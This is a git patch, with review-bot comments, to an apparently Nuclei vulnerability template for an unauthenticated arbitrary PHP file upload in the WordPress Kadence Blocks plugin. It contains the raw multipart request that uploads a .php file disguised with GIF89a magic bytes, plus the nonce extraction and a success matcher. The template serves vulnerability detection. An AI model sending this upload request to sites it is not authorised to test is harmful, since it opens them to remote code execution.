From 46ff6b8912a1d242536c29e671b452323adcdb2d Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 20 Oct 2023 20:27:14 +0530
Subject: [PATCH] updated matcher
---
 .../wordpress/wp-kadence-blocks-rce.yaml | 34 +++++++------------
 1 file changed, 12 insertions(+), 22 deletions(-)
diff --git a/http/vulnerabilities/wordpress/wp-kadence-blocks-rce.yaml b/http/vulnerabilities/wordpress/wp-kadence-blocks-rce.yaml
index a338e9c546..15b212b194 100644
--- a/http/vulnerabilities/wordpress/wp-kadence-blocks-rce.yaml
+++ b/http/vulnerabilities/wordpress/wp-kadence-blocks-rce.yaml
@@ -1,7 +1,7 @@
 id: wp-kadence-blocks-rce info: - name: WordPress Gutenberg Blocks by Kadence Blocks Plugin <= 3.1.10 is vulnerable to Arbitrary File Upload + name: WordPress Gutenberg Blocks Plugin <= 3.1.10 - Arbitrary File Upload author: theamanrawat severity: critical description: |
@@ -10,8 +10,8 @@ info: - https://wordpress.org/plugins/kadence-blocks/ - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kadence-blocks/kadence-blocks-3110-unauthenticated-arbitrary-file-upload metadata: - verified: "true" - tags: rce,wpscan,wordpress,wp-plugin,wp,kadence-blocks,unauthenticated + verified: true + tags: rce,wpscan,wordpress,wp-plugin,wp,kadence-blocks http: - raw: 
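Review bot: The `unauthenticated` tag dropped from `tags:` in the metadata hunk is the attribute that lets consumers filter this template by its authentication requirement, and the Wordfence reference kept two lines above still describes the issue as an unauthenticated arbitrary file upload. Unless the removal follows a repository-wide tagging convention I cannot see from here, keeping `tags: rce,wpscan,wordpress,wp-plugin,wp,kadence-blocks,unauthenticated` preserves that filtering for teams triaging by exposure. The `verified: true` change is fine on its own: the quoted `"true"` parsed as a string, and the unquoted boolean is presumably what the metadata schema expects.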
@@ -27,22 +27,22 @@ http: -----------------------------8779924633391890046425977712 Content-Disposition: form-data; name="fieldfb0b94-aa" - test + {{randstr}} -----------------------------8779924633391890046425977712 Content-Disposition: form-data; name="fieldec6f26-c7" - test@test.com + {{randstr}}@email.com -----------------------------8779924633391890046425977712 Content-Disposition: form-data; name="fieldc9b894-4c" - test + {{randstr}} -----------------------------8779924633391890046425977712 Content-Disposition: form-data; name="field983473-0a"; filename="{{randstr}}.php" Content-Type: application/x-php GIF89a - + -----------------------------8779924633391890046425977712 Content-Disposition: form-data; name="_kb_adv_form_post_id" @@ -61,24 +61,14 @@ http: {{nonce}} -----------------------------8779924633391890046425977712-- - matchers-condition: and matchers: - - type: word - part: body_2 - words: - - 'Submission Success, Thanks for getting in touch!' - - '"success":true' + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "application/json")' + - 'contains_all(body_2, "Submission Success, Thanks for getting in touch!", "success\":true")' condition: and - - type: word - part: header_2 - words: - - "application/json" - - - type: status - status: - - 200 - extractors: - type: regex name: nonce
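Review bot: The new DSL matcher's third token `"success\":true"` is weaker than the word it replaces: the removed matcher looked for `'"success":true'` including the opening quote, while the escaped DSL literal (assuming the expression language unescapes `\"`) evaluates to `success":true`, which would also be satisfied by any key that merely ends in `success`. Writing it as `"\"success\":true"` keeps the original JSON-token match and avoids the false positive. Separately, the three DSL lines only check the second response's status, content type and the form's success message; if no later request in the template (outside this hunk) fetches the uploaded `.php` file, a comment above `- type: dsl` such as `# Matches the form's success response only; the stored upload is not verified here` would make the evidence level clear to whoever triages a critical hit. Dropping `matchers-condition: and` is correct now that only one matcher remains.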